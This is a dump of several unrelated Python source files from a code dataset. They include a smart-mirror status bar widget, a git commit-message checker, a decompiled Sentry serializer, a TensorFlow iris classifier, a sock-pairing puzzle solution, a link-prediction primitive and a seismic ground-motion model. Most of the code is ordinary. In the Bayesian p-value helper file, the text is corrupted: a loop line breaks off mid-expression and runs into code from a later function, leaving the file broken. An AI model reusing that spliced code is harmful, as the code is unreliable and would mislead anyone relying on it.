_ = self.temp_GPU.communicate()\n self.temp_GPU = self.temp_GPU.decode('utf-8')\n self.temp_GPU = self.temp_GPU[self.temp_GPU.find('=') + 1: self.temp_GPU.find(\"'\")]\n self.temp_GPU = float(self.temp_GPU)\n self.temp_GPU = f'GPU {self.temp_GPU}°C'\n except Exception as exc:\n self.logger.error(f'Cannot get the GPU temp: {exc}')\n\n if self.IP_address:\n self.statusbar_frame.after(self.REFRESH_RATE, self.get_ip_address)\n else:\n self.statusbar_frame.after(self.REFRESH_RATE, self.status)\n\n def get_ip_address(self):\n try:\n self.IP_address = subprocess.Popen(\n 'hostname -I',\n shell=True, \n stdin=None, \n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE\n )\n\n self.IP_address, _ = self.IP_address.communicate()\n self.IP_address = f'IP: {self.IP_address.decode(\"utf-8\")}'\n except Exception as exc:\n self.logger.error(f'Cannot get the IP address: {exc}')\n self.statusbar_frame.after(self.REFRESH_RATE, self.status)\n\n def widget_update(self, *args):\n try:\n self.logger.debug('Updating statusbar widget...')\n self.relx = args[0]\n self.rely = args[1]\n self.statusbar_frame.place(relx=self.relx, rely=self.rely)\n width = args[2]\n height = args[3]\n self.anchor = args[4]\n if self.anchor == 'ne':\n self.relx += width\n self.target_width = int(width * self.window_width)\n self.target_height = int(height * self.window_height)\n self.font_size = 50\n\n self.statusbar_frame.place(\n relx=self.relx,\n rely=self.rely,\n anchor=self.anchor\n )\n if self.temp_CPU:\n self.cpu_temp_label.config(text='CPU __._°C')\n if self.temp_GPU:\n self.gpu_temp_label.config(text='GPU __._°C')\n if self.IP_address:\n self.ip_address_label.config(text='000.000.000.000')\n\n self.get_font_size()\n self.topframe_inside.grid(\n 
column=0,\n                row=0,\n                sticky=self.anchor\n            )\n\n            self.middleframe_inside.grid(\n                column=0,\n                row=1,\n                sticky=self.anchor\n            )\n\n            self.bottomframe_inside.grid(\n                column=0,\n                row=2,\n                sticky=self.anchor\n            )\n\n            if self.anchor == 'nw':\n                if self.temp_CPU:\n                    self.cpu_temp_label.pack(side=LEFT)\n                if self.temp_GPU:\n                    self.gpu_temp_label.pack(side = LEFT)\n                if self.IP_address:\n                    self.ip_address_label.pack(side = LEFT)\n            else:\n                if self.temp_CPU:\n                    self.cpu_temp_label.pack(side=RIGHT)\n                if self.temp_GPU:\n                    self.gpu_temp_label.pack(side = RIGHT)\n                if self.IP_address:\n                    self.ip_address_label.pack(side = RIGHT)\n            self.logger.debug('Widget has been updated!')\n        except Exception as exc:\n            self.logger.error(f'Cannot update the widget: {exc}')\n\n    def destroy(self):\n        self.logger.debug('Closing Statusbar...')\n        self.statusbar_frame.destroy()\n\nif __name__ == '__main__':\n    try:\n        window = Tk()\n        window.title('Main Window')\n        window.configure(bg='black')\n        #window.overrideredirect(True)\n        w, h = window.winfo_screenwidth(), window.winfo_screenheight()\n        window.geometry(\"%dx%d+0+0\" % (w, h))\n        a = Statusbar(window)\n        window.mainloop()\n    except KeyboardInterrupt:\n        sys.exit()\n\n__version__ = '0.97' # 19th November 2020\n__author__ = 'Dmitry Kudryashov'\n__maintainer__ = 'Dmitry Kudryashov'\n__email__ = \"dmitry-kud@yandex.ru\"\n__status__ = \"Development\"","sub_path":"smartmirror2/widgets/statusbar.py","file_name":"statusbar.py","file_ext":"py","file_size_in_byte":12786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"230090087","text":"#!/usr/bin/python3\n\n\"\"\" * When the commit command is triggered, this program will be called\n\t* By default, the second parameter will be a link to the temporary file where the commit's message is stored\n\t\t* We can read through this file to judge whether the message is appropriate or not \n\t\t\n\t* A good commit message should obey the following rules:\n\t\t* Separate subject from body with a blank line\n\t\t* Limit the subject line to 50 characters\n\t\t* Capitalise the subject line\n\t\t* Do not end the subject line with a period (ie '.')\n\t\t* Wrap text at 72 characters (don't let any line have more than 72 characters) \n\t* We can write checks that these rules are being followed, or throw an error \"\"\"\n
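\n# For reference, an illustrative message that would pass every check below\n# (a made-up example of the rules above, not taken from any real repository):\n#\n#   Add size checks to the uploader\n#\n#   Reject files over the configured limit before streaming starts, so\n#   the worker no longer runs out of memory on oversized uploads.\n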
\nimport sys\n\ndef main():\n\tmessage = \"\"\n\tcharCount = 0\n\tlineCount = 0\n\t\n\tfile = open(sys.argv[1], \"r\")\n\tmessage = file.read()\n\tmessageLength = len(message)\n\t\n\tfor i in range(0, messageLength): \n\t\tif message[i] == '\n': #gives us raw character\n\t\t\tlineCount += 1\n\t\t\tcharCount = 0\n\t\t\tcontinue\n\t\t\t\n\t\tif(message[i] == '.' and lineCount == 0 and (i + 1 == messageLength or message[i + 1] == '\n')): #4) Do not end the subject line with a period (ie '.')\n\t\t\tprint(\"The subject ends with a period!\")\n\t\t\treturn 1\n\t\t\n\t\tif lineCount == 1 and message[i] != '\n':\n\t\t\tprint(\"The line between the subject and body (line 2) is not blank!\")\n\t\t\treturn 1\n\t\t\t\t\t\t\n\t\tif lineCount == 0 and charCount == 0 and message[i].isupper() == False: #3) Capitalise the subject line\n\t\t\tprint(\"Subject line is not capitalised!\")\n\t\t\treturn 1\n\t\t\n\t\tcharCount += 1 \n\t\tif charCount > 50 and lineCount == 0: #2) Limit the subject line to 50 characters\n\t\t\tprint(\"Subject line is over 50 characters!\")\n\t\t\treturn 1\n\t\t\n\t\tif lineCount >= 2 and charCount > 72: #5) Wrap text at 72 characters (don't let any line have more than 72 characters) \n\t\t\tprint(\"Body text is over 72 characters!\")\n\t\t\treturn 1\n\t\t\n\tif lineCount < 2: #1) Separate subject from body with a blank line (a body must exist)\n\t\tprint(\"There is no body of text!\")\n\t\treturn 1\n\t\n\tprint(\"No message error detected\")\n\treturn 0\n\t\t\nif __name__ == \"__main__\":\n\tsys.exit(main())","sub_path":".githooks/commit-msg.py","file_name":"commit-msg.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"508001208","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/src/sentry/src/sentry/incidents/endpoints/serializers.py\n# Compiled at: 2019-08-23 05:13:18\nfrom __future__ import absolute_import\nfrom datetime import timedelta\nimport six\nfrom enum import Enum\nfrom rest_framework import serializers\nfrom sentry.api.serializers.rest_framework.base import CamelSnakeModelSerializer\nfrom sentry.incidents.models import AlertRule, AlertRuleAggregations, AlertRuleThresholdType\nfrom sentry.incidents.logic import AlertRuleNameAlreadyUsedError, create_alert_rule, update_alert_rule\n\nclass AlertRuleSerializer(CamelSnakeModelSerializer):\n    aggregations = serializers.ListField(child=serializers.IntegerField())\n\n    class Meta:\n        model = AlertRule\n        fields = [\n         'name',\n         'threshold_type',\n         'query',\n         'time_window',\n         'alert_threshold',\n         'resolve_threshold',\n         'threshold_period',\n         'aggregations']\n        extra_kwargs = {'query': {'allow_blank': True, 'required': True}, 'threshold_period': {'default': 1, 'min_value': 1, 'max_value': 20}, 'alert_threshold': {'required': True}, 'resolve_threshold': {'required': True}, 'time_window': {'min_value': 1, \n                         'max_value': int(timedelta(days=1).total_seconds() / 60), \n                         'required': True}, \n           'aggregations': {'min_length': 1, 'max_length': 10, 'required': True}, 'name': {'min_length': 1, 'max_length': 64}}\n\n    def validate_threshold_type(self, threshold_type):\n        try:\n            return AlertRuleThresholdType(threshold_type)\n        except ValueError:\n            raise serializers.ValidationError('Invalid threshold type, valid values are %s' % [ item.value for item in AlertRuleThresholdType ])\n\n    def validate_aggregations(self, aggregations):\n        try:\n            return [ AlertRuleAggregations(agg) for agg in aggregations ]\n        except ValueError:\n            raise serializers.ValidationError('Invalid aggregation, valid values are %s' % [ item.value for item in AlertRuleAggregations ])\n\n    def create(self, validated_data):\n        try:\n            return create_alert_rule(project=self.context['project'], **validated_data)\n        except AlertRuleNameAlreadyUsedError:\n            raise 
serializers.ValidationError('This name is already in use for this project')\n\n def _remove_unchanged_fields(self, instance, validated_data):\n for field_name, value in list(six.iteritems(validated_data)):\n if isinstance(value, Enum):\n value = value.value\n elif field_name == 'aggregations':\n value = [ item.value for item in value ]\n if getattr(instance, field_name) == value:\n validated_data.pop(field_name)\n\n return validated_data\n\n def update(self, instance, validated_data):\n validated_data = self._remove_unchanged_fields(instance, validated_data)\n return update_alert_rule(instance, **validated_data)","sub_path":"pycfiles/sentry-10.0.0-py27-none-any/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"524783810","text":"import tensorflow as tf\nimport numpy as np\nimport os\n\n# Data sets\nIRIS_TRAINING = os.path.join(\"iris\", \"iris_training.csv\")\nIRIS_TEST = os.path.join(\"iris\", \"iris_test.csv\")\n\n# Load datasets.\ntraining_set = tf.contrib.learn.datasets.base.load_csv_with_header(\n filename=IRIS_TRAINING,\n target_dtype=np.int,\n features_dtype=np.float32)\ntest_set = tf.contrib.learn.datasets.base.load_csv_with_header(\n filename=IRIS_TEST,\n target_dtype=np.int,\n features_dtype=np.float32)\n\n# Specify that all features have real-value data\nfeature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=4)]\n\nclassifier = tf.contrib.learn.DNNClassifier(\n\tfeature_columns=feature_columns,\n\thidden_units=[10, 20, 10],\n\tn_classes=3,\n\tmodel_dir=\"/tmp/iris_model\")\n\n# Fit model.\nclassifier.fit(input_fn=lambda: (tf.constant(training_set.data), tf.constant(training_set.target)),\n steps=2000)\n\n# Evaluate accuracy.\naccuracy_score = classifier.evaluate(x=test_set.data, y=test_set.target)['accuracy']\nprint('Accuracy: {0:f}'.format(accuracy_score))\n\n# Classify two new flower samples.\nnew_samples = np.array(\n [[6.4, 3.2, 4.5, 1.5], [5.8, 3.1, 5.0, 1.7]], dtype=float)\ny = list(classifier.predict(new_samples, as_iterable=True))\nprint('Predictions: {}'.format(str(y)))\n","sub_path":"tensorflow_examples/iris_classifier.py","file_name":"iris_classifier.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"486938078","text":"#!/bin/python\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# function to calculate the appearance of each value in array\n# returns dictionary\ndef countValues(ar):\n values = {}\n\n for v in ar:\n if v in values:\n values[v] += 1\n else:\n values[v] = 1\n\n return values\n\n# function to generate the result\ndef sockMerchant(n, ar):\n # create dictionary with all values and their frequency\n values = countValues(ar)\n\n # for each value in values:\n # if it's even, we can form (value / 2) pairs\n # if it's odd, we can form ((value - 1) / 2) pairs (and one sock will be left)\n # => so we can divide value by 2 and round to the lowest number by applying int()\n return sum(list(map(lambda x: int(x / 2), values.values())))\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n n = int(raw_input())\n ar = map(int, raw_input().rstrip().split())\n result = sockMerchant(n, ar)\n\n fptr.write(str(result) + '\\n')\n fptr.close()","sub_path":"Warm-up Challenges/Sock Merchant.py","file_name":"Sock 
Merchant.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"63280277","text":"__author__ = 'pdh21'\nfrom astropy.io import fits\nimport scipy.stats as st\nimport numpy as np\nfrom astropy.io import fits\n\n\ndef ymod_map(prior,flux):\n \"\"\"Create replicated model map (no noise or background) i.e. A*f\n\n :param prior: prior class\n :param flux: flux vector\n :return: map array, in same format as prior.sim\n \"\"\"\n from scipy.sparse import coo_matrix\n\n f=coo_matrix((flux, (range(0,prior.nsrc),np.zeros(prior.nsrc))), shape=(prior.nsrc, 1))\n A=coo_matrix((prior.amat_data, (prior.amat_row, prior.amat_col)), shape=(prior.snpix, prior.nsrc))\n rmap_temp=(A*f)\n #pred_map=np.empty_like(prior.im)\n #pred_map[:,:]=0.0\n #pred_map[prior.sy_pix,prior.sx_pix]=np.asarray(rmap_temp.todense()).reshape(-1)#+np.random.randn(prior.snpix)*prior.snim\n\n return np.asarray(rmap_temp.todense())\n\n\ndef post_rep_map(prior,mod_map,back,conf_noise):\n return mod_map+back+np.random.normal(scale=np.sqrt(prior.snim**2+conf_noise**2))\n\ndef Bayesian_pvals(prior,post_rep_map):\n pval=np.empty_like(prior.sim)\n for i in range(0,prior.snpix):\n ind=post_rep_map[i,:] 2*T_rep\n Bayes_pval_res_vals[i]=sum(ind_T)/np.float(post_rep_map.shape[1])\n return Bayes_pval_res_vals\n\ndef post_rep_map(prior,mod_map,back,conf_noise):\n return mod_map+back+np.random.normal(scale=np.sqrt(prior.snim**2+conf_noise**2))\n\n\ndef make_Bayesian_pval_maps(prior,post_rep_map):\n import scipy.stats as st\n pval=np.empty_like(prior.sim)\n for i in range(0,prior.snpix):\n ind=post_rep_map[i,:] None:\n super().__init__(hyperparams=hyperparams, random_seed=random_seed, docker_containers=docker_containers)\n self._fitted: bool = False\n self._inner_products: container.List = []\n self._embeddings: container.List = []\n\n def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> CallResult[Outputs]:\n if not self._fitted:\n raise ValueError(\"Not fitted\")\n \n np.random.seed(self.random_seed)\n \n csv = inputs[1]\n \n\n # print(csv, file=sys.stderr)\n csv_headers = csv.columns\n for header in csv_headers:\n if header[:6] == \"source\":\n SOURCE = header\n elif header[:6] == \"target\":\n TARGET = header\n \n source_nodeID = np.array(csv[SOURCE]).astype(int)\n target_nodeID = np.array(csv[TARGET]).astype(int)\n \n try:\n int(np.array(csv['linkType'])[0])\n except:\n csv['linkType'] = np.zeros(len(source_nodeID))\n \n link_types = np.array(csv['linkType']).astype(int)\n\n n_links = len(self._inner_products) - 1\n n_nodes = int(self._embeddings.shape[0] / n_links)\n\n n_preds = csv.shape[0]\n\n predictions = np.zeros(n_preds)\n\n global_noexists = self._inner_products[-1][0]\n global_exists = self._inner_products[-1][1]\n\n # The following code is used for \"global\" classification only; i.e. 
we ignore edge type training data\n        for i in range(n_preds):\n            temp_source = source_nodeID[i]\n            temp_target = target_nodeID[i]\n            temp_link = link_types[i]\n            temp_inner_product = self._embeddings[temp_link*n_nodes + temp_source-1] @ self._embeddings[temp_link*n_nodes + temp_target-1]\n            temp_noexists = self._inner_products[temp_link][0]\n            temp_exists = self._inner_products[temp_link][1]\n\n            # There are three 'degenerate' cases --\n            # 1) Both the exists and no exists lists are empty (first 'if')\n            # 2/3) One but not the other is empty ('elif')\n            # if len(temp_noexists) == 0 and len(temp_exists) == 0:\n            # Rank the candidate edge's inner product within the pooled 'no-edge'\n            # and 'edge' score distributions; whichever quantile sits closer to\n            # its median decides the predicted label.\n            rank_noexists = np.sum(temp_inner_product > global_noexists)\n            quantile_noexists = rank_noexists / len(global_noexists)\n\n            rank_exists = np.sum(temp_inner_product > global_exists)\n            quantile_exists = rank_exists / len(global_exists)\n\n            if abs(quantile_noexists - 1/2) < abs(quantile_exists - 1/2):\n                predictions[i] = int(0)\n            elif abs(quantile_noexists - 1/2) > abs(quantile_exists - 1/2):\n                predictions[i] = int(1)\n            else:\n                predictions[i] = int(np.random.binomial(1, 0.5))\n        \n        csv['linkExists'] = predictions.astype(int)\n        outputs = container.DataFrame(csv[['d3mIndex', 'linkExists']])\n\n        return base.CallResult(outputs)\n\n    def fit(self, *, timeout: float = None, iterations: int = None) -> base.CallResult[None]:\n        if self._fitted:\n            return base.CallResult(None)\n\n        embeddings = self._training_inputs[0]\n        csv = self._training_inputs[1]\n        n_nodes, n_links = self._training_inputs[2][0], self._training_inputs[2][1]\n\n        n_info = csv.shape[0]\n        ranks = [[[], []] for i in range(n_links + 1)]\n\n        try:\n            int(np.array(csv['linkType'])[0])\n        except:\n            csv['linkType'] = np.zeros(n_info)\n\n        # print(csv, file=sys.stderr)\n        csv_headers = csv.columns\n        for header in csv_headers:\n            if header[:6] == \"source\":\n                SOURCE = header\n            elif header[:6] == \"target\":\n                TARGET = header\n\n        for i in range(n_info):\n            temp_link = int(np.array(csv['linkType'])[i])\n            temp_exists = int(np.array(csv['linkExists'])[i])\n            temp_source = int(np.array(csv[SOURCE])[i])\n            temp_target = int(np.array(csv[TARGET])[i])\n            temp_dot = embeddings[temp_link*n_nodes + temp_source - 1] @ embeddings[temp_link*n_nodes + temp_target - 1]\n            ranks[temp_link][temp_exists].append(temp_dot)\n            ranks[-1][temp_exists].append(temp_dot)\n\n        for i in range(len(ranks)):\n            ranks[i][0] = np.sort(ranks[i][0])\n            ranks[i][1] = np.sort(ranks[i][1])\n\n        self._embeddings = embeddings\n        self._inner_products = ranks\n\n        self._fitted = True\n\n        return base.CallResult(None)\n\n    def set_training_data(self, *, inputs: Inputs) -> None:\n        self._training_inputs = inputs\n\n    def get_params(self) -> Params:\n        if not self._fitted:\n            raise ValueError(\"Fit not performed.\")\n\n        return Params(\n            inner_products = self._inner_products,\n            embeddings = self._embeddings\n        )\n\n    def set_params(self, *, params: Params) -> None:\n        self._fitted = True\n        self._inner_products = params['inner_products']\n\n        self._embeddings = params['embeddings']\n","sub_path":"build/lib/jhu_primitives/link_pred_rc/link_pred_rc.py","file_name":"link_pred_rc.py","file_ext":"py","file_size_in_byte":8471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"465136529","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"Model for the Campbell and Bozorgnia (2014) ground motion model.\"\"\"\n\nfrom __future__ import division\n\nimport logging\n\nimport numpy as np\n\nfrom . 
import model\nfrom .chiou_youngs_2014 import ChiouYoungs2014 as CY14\n\n__author__ = 'Albert Kottke'\n\n\nclass CampbellBozorgnia2014(model.Model):\n    \"\"\"Campbell and Bozorgnia (2014, :cite:`campbell14`) model.\n\n    This model was developed for active tectonic regions as part of the\n    NGA-West2 effort.\n    \"\"\"\n\n    NAME = 'Campbell & Bozorgnia (2014)'\n    ABBREV = 'CB14'\n\n    # Reference velocity (m/sec)\n    V_REF = 1100.\n\n    # Load the coefficients for the model\n    COEFF = model.load_data_file('campbell_bozorgnia_2014.csv', 2)\n\n    PERIODS = COEFF['period']\n\n    # Period independent model coefficients\n    COEFF_C = 1.88\n    COEFF_N = 1.18\n    COEFF_H_4 = 1\n\n    INDICES_PSA = np.arange(21)\n    INDEX_PGA = -2\n    INDEX_PGV = -1\n\n    PARAMS = [\n        model.NumericParameter('depth_1_0', False),\n        model.NumericParameter('depth_2_5', False, 0, 10),\n        model.NumericParameter('depth_bor', False),\n        model.NumericParameter('depth_bot', False, default=15.),\n        model.NumericParameter('depth_hyp', False, 0, 20),\n        model.NumericParameter('depth_tor', False, 0, 20),\n        model.NumericParameter('dip', True, 15, 90),\n        model.NumericParameter('dist_jb', True),\n        model.NumericParameter('dist_rup', True, None, 300),\n        model.NumericParameter('dist_x', True),\n        model.NumericParameter('mag', True, 3.3, 8.5),\n        model.NumericParameter('v_s30', True, 150, 1500),\n        model.NumericParameter('width', False),\n\n        model.CategoricalParameter(\n            'region', False,\n            ['global', 'california', 'japan', 'italy', 'china'], 'global'),\n        model.CategoricalParameter('mechanism', True, ['SS', 'NS', 'RS']),\n    ]\n\n    def _check_inputs(self, **kwds):\n        super(CampbellBozorgnia2014, self)._check_inputs(**kwds)\n        p = self.params\n\n        for mech, limit in [('SS', 8.5), ('RS', 8.0), ('NS', 7.5)]:\n            if mech == p['mechanism'] and p['mag'] > limit:\n                logging.warning(\n                    'Magnitude of %g is greater than the recommended limit of '\n                    '%g for %s style faults',\n                    p['mag'], limit, mech\n                )\n\n        if p['depth_2_5'] is None:\n            p['depth_2_5'] = self.calc_depth_2_5(\n                p['v_s30'], p['region'], p['depth_1_0'])\n\n        if p['depth_tor'] is None:\n            p['depth_tor'] = CY14.calc_depth_tor(p['mag'], p['mechanism'])\n\n        if p['width'] is None:\n            p['width'] = CampbellBozorgnia2014.calc_width(\n                p['mag'], p['dip'], p['depth_tor'], p['depth_bot'])\n\n        if p['depth_bor'] is None:\n            p['depth_bor'] = self.calc_depth_bor(\n                p['depth_tor'], p['dip'], p['width'])\n\n        if p['depth_hyp'] is None:\n            p['depth_hyp'] = CampbellBozorgnia2014.calc_depth_hyp(\n                p['mag'], p['dip'], p['depth_tor'], p['depth_bor'])\n\n    def __init__(self, **kwds):\n        \"\"\"Compute the response predicted by the Campbell and Bozorgnia (2014)\n        ground motion model.\n\n        Keyword Args:\n            depth_1_0 (Optional[float]): depth to the 1.0 km∕s shear-wave\n                velocity horizon beneath the site, :math:`Z_{1.0}` in (km).\n                Used to estimate `depth_2_5`.\n\n            depth_2_5 (Optional[float]): depth to the 2.5 km∕s shear-wave\n                velocity horizon beneath the site, :math:`Z_{2.5}` in (km).\n                If *None*, then it is computed from `depth_1_0` or `v_s30`\n                and the `region` parameter.\n\n            depth_tor (Optional[float]): depth to the top of the rupture\n                plane (:math:`Z_{tor}`, km). If *None*, then the average\n                model is used.\n\n            depth_bor (Optional[float]): depth to the bottom of the rupture\n                plane (:math:`Z_{bor}`, km). If *None*, then the average\n                model is used.\n\n            depth_bot (Optional[float]): depth to bottom of seismogenic crust\n                (km). Used to calculate fault width if none is specified. 
If\n *None*, then a value of 15 km is used.\n\n depth_hyp (Optional[float]): depth of the hypocenter (km). If\n *None*, then the model average is used.\n\n dip (float): fault dip angle (:math:`\\phi`, deg).\n\n dist_jb (float): Joyner-Boore distance to the rupture plane\n (:math:`R_\\\\text{JB}`, km)\n\n dist_rup (float): closest distance to the rupture plane\n (:math:`R_\\\\text{rup}`, km)\n\n dist_x (float): site coordinate measured perpendicular to the\n fault strike from the fault line with the down-dip direction\n being positive (:math:`R_x`, km).\n\n mag (float): moment magnitude of the event (:math:`M_w`)\n\n mechanism (str): fault mechanism. Valid values: \"SS\", \"NS\", \"RS\".\n\n region (Optional[str]): region. Valid values: \"california\",\n \"china\", \"italy\", \"japan\". If *None*, then \"california\" is\n used as a default value.\n\n v_s30 (float): time-averaged shear-wave velocity over the top 30 m\n of the site (:math:`V_{s30}`, m/s).\n\n width (Optional[float]): Down-dip width of the fault. If *None*,\n then the model average is used.\n \"\"\"\n super(CampbellBozorgnia2014, self).__init__(**kwds)\n p = self.params\n\n pga_ref = np.exp(\n self._calc_ln_resp(np.nan, self.V_REF)[self.INDEX_PGA])\n\n self._ln_resp = self._calc_ln_resp(pga_ref, p['v_s30'])\n self._ln_std = self._calc_ln_std(pga_ref)\n\n def _calc_ln_resp(self, pga_ref, v_s30):\n \"\"\"Calculate the natural logarithm of the response.\n\n Args:\n pga_ref (float): peak ground acceleration (g) at the reference\n condition. If :class:`np.nan`, then no site term is applied.\n\n v_s30 (float): time-averaged shear-wave velocity over the top 30 m\n of the site (:math:`V_{s30}`, m/s).\n\n Returns:\n :class:`np.array`: Natural log of the response.\n \"\"\"\n p = self.params\n c = self.COEFF\n\n # Magnitude term\n f_mag = c.c_0 + c.c_1 * p['mag']\n for min_mag, slope in ([4.5, c.c_2], [5.5, c.c_3], [6.5, c.c_4]):\n if min_mag < p['mag']:\n f_mag += slope * (p['mag'] - min_mag)\n else:\n break\n\n # Geometric attenuation term\n f_dis = (c.c_5 + c.c_6 * p['mag']) * np.log(np.sqrt(\n p['dist_rup'] ** 2 + c.c_7 ** 2\n ))\n\n # Style of faulting term\n taper = np.clip(p['mag'] - 4.5, 0, 1)\n if p['mechanism'] == 'RS':\n f_flt = c.c_8 * taper\n elif p['mechanism'] == 'NS':\n f_flt = c.c_9 * taper\n else:\n f_flt = 0\n\n # Hanging-wall term\n R_1 = p['width'] * np.cos(np.radians(p['dip']))\n R_2 = 62 * p['mag'] - 350\n if p['dist_x'] < 0:\n f_hngRx = 0\n elif p['dist_x'] <= R_1:\n ratio = p['dist_x'] / R_1\n f_hngRx = c.h_1 + c.h_2 * ratio + c.h_3 * ratio ** 2\n else:\n ratio = (p['dist_x'] - R_1) / (R_2 - R_1)\n f_hngRx = np.maximum(0, c.h_4 + c.h_5 * ratio + c.h_6 * ratio ** 2)\n\n if p['dist_rup'] == 0:\n f_hngRrup = 1\n else:\n f_hngRrup = (p['dist_rup'] - p['dist_jb']) / p['dist_rup']\n\n if p['mag'] <= 5.5:\n f_hngM = 0\n else:\n f_hngM = \\\n np.minimum(p['mag'] - 5.5, 1) * (1 + c.a_2 * (p['mag'] - 6.5))\n\n f_hngZ = 0 if p['depth_tor'] > 16.66 else 1 - 0.06 * p['depth_tor']\n f_hngDip = (90 - p['dip']) / 45\n\n f_hng = c.c_10 * f_hngRx * f_hngRrup * f_hngM * f_hngZ * f_hngDip\n\n # Site term\n f_site = np.zeros_like(c.period)\n vs_ratio = v_s30 / c.k_1\n mask = (v_s30 <= c.k_1)\n f_site[mask] = (\n c.c_11 * np.log(vs_ratio) +\n c.k_2 * (np.log(pga_ref +\n self.COEFF_C * vs_ratio ** self.COEFF_N) -\n np.log(pga_ref + self.COEFF_C))\n )[mask]\n f_site[~mask] = (\n (c.c_11 + c.k_2 * self.COEFF_N) * np.log(vs_ratio)\n )[~mask]\n\n if p['region'] == 'japan':\n # Apply regional correction for Japan\n if v_s30 <= 200:\n f_site 
+= (\n (c.c_12 + c.k_2 * self.COEFF_N) *\n (np.log(vs_ratio) - np.log(200 / c.k_1))\n )\n else:\n f_site += (c.c_13 + c.k_2 * self.COEFF_N) * np.log(vs_ratio)\n\n # Basin response term\n if np.isnan(pga_ref):\n # Use model to compute depth_2_5 for the reference velocity case\n depth_2_5 = self.calc_depth_2_5(v_s30, p['region'])\n else:\n depth_2_5 = p['depth_2_5']\n\n if depth_2_5 <= 1:\n f_sed = c.c_14 * (depth_2_5 - 1)\n if p['region'] == 'japan':\n f_sed += c.c_15 * (depth_2_5 - 1)\n elif depth_2_5 <= 3:\n f_sed = 0\n else:\n f_sed = (c.c_16 * c.k_3 * np.exp(-0.75) *\n (1 - np.exp(-0.25 * (depth_2_5 - 3))))\n\n # Hypocentral depth term\n f_hypH = np.clip(p['depth_hyp'] - 7, 0, 13)\n f_hypM = c.c_17 + (c.c_18 - c.c_17) * np.clip(p['mag'] - 5.5, 0, 1)\n f_hyp = f_hypH * f_hypM\n\n # Fault dip term\n f_dip = c.c_19 * p['dip'] * np.clip(5.5 - p['mag'], 0, 1)\n\n # Anelastic attenuation term\n if p['region'] in ['japan', 'italy']:\n dc_20 = c.dc_20jp\n elif p['region'] == 'china':\n dc_20 = c.dc_20ch\n else:\n dc_20 = c.dc_20ca\n\n f_atn = (c.c_20 + dc_20) * max(p['dist_rup'] - 80, 0)\n\n ln_resp = (f_mag + f_dis + f_flt + f_hng + f_site + f_sed + f_hyp +\n f_dip + f_atn)\n return ln_resp\n\n def _calc_ln_std(self, pga_ref):\n \"\"\"Calculate the logarithmic standard deviation.\n\n Args:\n pga_ref (float): peak ground acceleration (g) at the reference\n condition.\n\n Returns:\n :class:`np.array`: Logarithmic standard deviation.\n \"\"\"\n p = self.params\n c = self.COEFF\n\n tau_lnY = c.tau_2 + (c.tau_1 - c.tau_2) * np.clip(5.5 - p['mag'], 0, 1)\n phi_lnY = c.phi_2 + (c.phi_1 - c.phi_2) * np.clip(5.5 - p['mag'], 0, 1)\n\n vs_ratio = p['v_s30'] / c.k_1\n alpha = np.zeros_like(c.period)\n mask = p['v_s30'] < c.k_1\n alpha[mask] = (\n c.k_2 * pga_ref * (\n (pga_ref + self.COEFF_C * vs_ratio ** self.COEFF_N) ** (-1) -\n (pga_ref + self.COEFF_C) ** -1)\n )[mask]\n\n tau_lnPGA = tau_lnY[self.INDEX_PGA]\n tau = np.sqrt(tau_lnY ** 2 + alpha ** 2 * tau_lnPGA ** 2 +\n 2 * alpha * c.rho_lnPGAlnY * tau_lnY * tau_lnPGA)\n\n phi_lnPGA = phi_lnY[self.INDEX_PGA]\n phi_lnAF_PGA = self.COEFF['phi_lnAF'][self.INDEX_PGA]\n phi_lnPGA_B = np.sqrt(phi_lnPGA ** 2 - phi_lnAF_PGA ** 2)\n phi_lnY_B = np.sqrt(phi_lnY ** 2 - c.phi_lnAF ** 2)\n\n phi = np.sqrt(phi_lnY_B ** 2 + c.phi_lnAF ** 2 +\n alpha ** 2 * (phi_lnPGA ** 2 - phi_lnAF_PGA ** 2) +\n 2 * alpha * c.rho_lnPGAlnY * phi_lnY_B * phi_lnPGA_B)\n\n ln_std = np.sqrt(phi ** 2 + tau ** 2)\n\n return ln_std\n\n @staticmethod\n def calc_depth_2_5(v_s30, region='global', depth_1_0=None):\n \"\"\"Calculate the depth to a shear-wave velocity of 2.5 km/sec\n (:math:`Z_{2.5}`).\n\n Provide either `v_s30` or `depth_1_0`.\n\n Args:\n v_s30 (Optional[float]): time-averaged shear-wave velocity over\n the top 30 m of the site (:math:`V_{s30}`, m/s).\n\n Keyword Args:\n region (Optional[str]): region of the basin model. 
